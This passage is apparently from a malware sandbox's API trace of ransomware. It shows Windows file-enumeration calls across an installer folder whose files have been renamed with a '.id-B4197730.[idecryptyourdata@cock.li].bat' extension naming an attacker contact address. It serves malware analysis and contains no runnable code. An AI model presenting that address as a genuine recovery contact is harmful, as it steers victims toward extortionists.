lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd709a28, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd709a28, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd755eac, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.274] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd709a28, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd709a28, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd755eac, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.274] FindClose (in: hFindFile=0x727e08 | out: hFindFile=0x727e08) returned 1 [0156.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.275] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="2070", cAlternateFileName="")) returned 1 [0156.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.275] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x728388 [0156.276] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.276] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdc40cc8, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdc40cc8, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdd259f9, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1094, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.276] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdc40cc8, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdc40cc8, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdd0ddaa, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13a76, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.276] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd755eac, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd755eac, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd77c0d5, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.276] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd755eac, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd755eac, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd77c0d5, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.276] FindClose (in: hFindFile=0x728388 | out: hFindFile=0x728388) returned 1 [0156.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.277] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="3076", cAlternateFileName="")) returned 1 [0156.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.277] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x728408 [0156.278] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.278] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdcb48ae, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdcb48ae, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdd259f9, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1994, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.278] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdd0ddaa, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdd0ddaa, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdea314b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xee96, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.278] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd77c0d5, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd77c0d5, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd7a2240, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.278] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd77c0d5, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd77c0d5, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd7a2240, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.279] FindClose (in: hFindFile=0x728408 | out: hFindFile=0x728408) returned 1 [0156.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.279] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="3082", cAlternateFileName="")) returned 1 [0156.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.280] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x727f08 [0156.280] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.280] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdd259f9, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdd259f9, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdec93ef, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xce4, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.281] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdd4bcc1, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdd4bcc1, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdeef566, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13976, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.281] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8d361e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8d361e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8f989f, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.281] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8d361e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8d361e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8f989f, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.281] FindClose (in: hFindFile=0x727f08 | out: hFindFile=0x727f08) returned 1 [0156.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.282] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Client", cAlternateFileName="")) returned 1 [0156.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.282] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x7283c8 [0156.283] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.283] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfddbe406, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfddbe406, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdeef566, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x31546, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="Parameterinfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PARAME~1.BAT")) returned 1 [0156.283] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdec93ef, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdec93ef, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdffa6eb, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="UIINFO~1.BAT")) returned 1 [0156.283] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdec93ef, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdec93ef, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdffa6eb, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="UIINFO~1.BAT")) returned 0 [0156.283] FindClose (in: hFindFile=0x7283c8 | out: hFindFile=0x7283c8) returned 1 [0156.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.284] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdec93ef, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdec93ef, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe020920, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3ff4, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="DHtmlHeader.html.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DHTMLH~1.BAT")) returned 1 [0156.284] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8f989f, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8f989f, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd91f985, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x15ad2, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="DisplayIcon.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DISPLA~1.BAT")) returned 1 [0156.284] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Extended", cAlternateFileName="")) returned 1 [0156.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.285] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x727f48 [0156.286] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.286] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdeef566, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdeef566, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdfd443d, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x16d86, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="Parameterinfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PARAME~1.BAT")) returned 1 [0156.286] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdf15942, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdf15942, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdffa6eb, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="UIINFO~1.BAT")) returned 1 [0156.286] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdf15942, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdf15942, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdffa6eb, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="UIINFO~1.BAT")) returned 0 [0156.286] FindClose (in: hFindFile=0x727f48 | out: hFindFile=0x727f48) returned 1 [0156.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.287] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Graphics", cAlternateFileName="")) returned 1 [0156.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.287] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x727e08 [0156.288] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.444] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdac340c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdac340c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdac340c, 